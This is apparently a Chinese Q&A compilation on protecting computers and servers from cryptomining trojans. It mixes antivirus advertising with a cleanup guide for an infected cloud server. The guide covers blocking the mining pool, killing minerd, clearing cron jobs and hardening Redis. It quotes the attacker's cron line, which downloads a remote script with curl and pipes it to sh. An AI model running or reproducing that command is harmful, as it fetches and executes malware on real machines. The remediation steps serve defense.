內網挖礦防護
⑴ 攔截挖礦木馬程序應該怎麼做比較好
可以用騰訊電腦管家,全方位保護賬號安全,精確打擊木馬,瞬時查殺風險。電腦診所,針對日常電腦問題進行修復和處理,覆蓋問題范圍廣泛,快速搜索,智能匹配,一步一輕松解決電腦問題。實時全方位保護用戶電腦免受木馬攻擊。
⑵ 電腦上怎麼能攔截挖礦木馬程序
可以安裝騰訊電腦管家,攔截木馬程序的,推出「反挖礦防護」功能,可對此類挖礦木馬進行全面攔截。攔截並預警各類挖礦木馬程序和含有挖礦js腳本網頁的運行。
⑶ 阿里雲伺服器被挖礦了怎麼辦(純純電腦小白
1. 關閉訪問挖礦伺服器的訪問
iptables -A INPUT -s xmr.crypto-pool.fr -j DROP and iptables -A OUTPUT -d xmr.crypto-pool.fr -j DROP.
2. chmod -x minerd ,取消掉執行許可權, 在沒有找到根源前,千萬不要刪除 minerd,因為刪除了,過一回會自動有生成一個。
3. pkill minerd ,殺掉進程
4. service stop crond 或者 crontab -r 刪除所有的執行計劃
5. 執行top,查看了一會,沒有再發現minerd 進程了。
6.檢查/var/spool/cron/目錄下發現有個root用戶的定時器文件。
下載腳本的語句:
*/5 * * * * curl -fsSL http://www.haveabitchin.com/pm.sh?0105010 | sh
病毒文件內容如下,感興趣的可以研究下:
View Code
解決minerd並不是最終的目的,主要是要查找問題根源,我的伺服器問題出在了redis服務了,黑客利用了redis的一個漏洞獲得了伺服器的訪問許可權,http://blog.jobbole.com/94518/然後就注入了病毒,下面是解決辦法和清除工作:
1. 修復 redis 的後門,
配置bind選項, 限定可以連接Redis伺服器的IP, 並修改redis的默認埠6379.
配置AUTH, 設置密碼, 密碼會以明文方式保存在redis配置文件中.
配置rename-command CONFIG 「RENAME_CONFIG」, 這樣即使存在未授權訪問, 也能夠給攻擊者使用config指令加大難度
好消息是Redis作者表示將會開發」real user」,區分普通用戶和admin許可權,普通用戶將會被禁止運行某些命令,如conf
2. 打開 ~/.ssh/authorized_keys, 刪除你不認識的賬號
3. 查看你的用戶列表,是不是有你不認識的用戶添加進來。 如果有就刪除掉.
⑷ 有沒有什麼軟體可以對挖礦木馬進行防禦
試試騰訊電腦管家,當威脅出現時,電腦管家會閃電查殺與攔截,在完成安全動作之後又迅速安靜離開,彷彿從未來過,除了安全保護之外,不做一件多餘的事情。從「殺毒+管理」2合1產品形態的創新,到WestCoastLabs(西海岸)、VB100、AV-C、AV-TEST全球四大殺毒軟體評測的滿貫通過,騰訊電腦管家已經躋身國際一流水平,成為7億騰訊用戶最值得信賴的可靠夥伴。
⑸ 攔截挖礦木馬程序用什麼比較好
可以用騰訊電腦管家是殺毒加管理二合一的安全軟體,全方位保障用戶上網安全。首次參加AVC測評即獲性能最佳評級。是中國的首款二合一反病毒軟體,安全管家。占內存小,殺毒好,防護好。
⑹ 區域網內被種挖礦病毒,怎麼查找病毒來源主機是哪一台
有以下幾種方法:
在區域網中選部分電腦部署軟體防火牆,然後通過防火牆攔截記錄就能發現病毒源主機。這種適合小規模區域網。
使用專殺工具進行挨個主機殺毒,為防止病毒流竄,只開一台電腦進行殺毒,查殺完畢後立馬關機,再開另一台進行殺毒。工作量比較大。
部署企業版殺毒軟體,如火絨等。如需要,我可以幫你申請三個月免費試用。當然也可以自己去官網申請。
暫時就想到這么多,希望對你有用。
⑺ 同帳號的路由在一個內網里挖礦的情況嗎
需要雙WAN口的路由器就可以同時連接內外網。
外網網線接WAN口1,內網網線接WAN口2,電腦接LAN123任意一個。
輸入路由器背面的IP地址帳號密碼進入路由器,點擊設置向導---下一步輸入WIFI密碼,下一步選擇WAN口1---下一步選擇PPPOE--下一步輸入寬頻帳號密碼,保存。WAN口1的外網就通了。
⑻ 挖礦木馬如何避免
可以在騰訊智慧安全頁面申請使用騰訊御點
然後使用這個軟體上面的修復漏洞功能
直接對電腦的漏洞進行檢測和修復就可以了